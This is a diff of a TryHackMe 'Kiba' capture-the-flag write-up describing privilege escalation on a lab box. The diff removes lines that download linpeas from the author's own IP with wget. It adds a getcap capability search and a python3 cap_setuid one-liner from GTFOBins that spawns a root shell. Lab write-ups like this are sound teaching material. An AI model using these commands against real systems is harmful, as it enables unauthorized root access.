FryggFR/WriteUp/THM-kiba.md

 Nice, we have the reverse shell on the web server !

-1st flag obtained !
+`THM{xx_xxxx_xxxxx_xxxxxx_xxxx_xxx}`

 ## 3. Privilege escalation !

-After quick analyze of config file or something usefull, i found something interesting but i want see what linpeas can see, linpeas is a great tool for linux enumeration for privesc.
+After quick research of config files or something usefull, i found something interesting in kiba's home.

-1. Setup a webserver to download linpeas. python3 -m http.server 80
-2. Getting linpeas.sh on the server
-wget {MY_IP}/linpeas.sh
-3. Configure the script whith executable flag: chmod +x linpeas.sh
-4. run the script and wait !

-Great, linpeas found one interesting file !
+One folder is named **.hackmeplease**, in this folder, we have one file, python3 binarie

+We have to search capabilites to see if we can exloit it:

+`getcap -r / 2<dev/null`

+We found this capabilite who is exploitable to get the root :

 `/home/kiba/.hackmeplease/python3 = cap_setuid+ep`

 This binarie have **cap_setuid+ep** attribute, wich means this binarie can change his UID.
-We can use it to generate a shell with UID 0 and getting the root.
+We can use it to generate a shell with UID 0 and getting a shell with root privileges.

-We can see python have the setuid capabilite and we can exploit this.
-Using GTFOBins we have the right payload to get the root :
+On [GTFOBins](https://gtfobins.github.io/) we have the right payload to get the root :

 ```/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'```

 We have the root !

-root flag obtained !
+This boxe is now rooted !

+`THM{xxxxxxxxx_xxxxxxxxxx_xxxxx_xxxxxxxxxxxx}`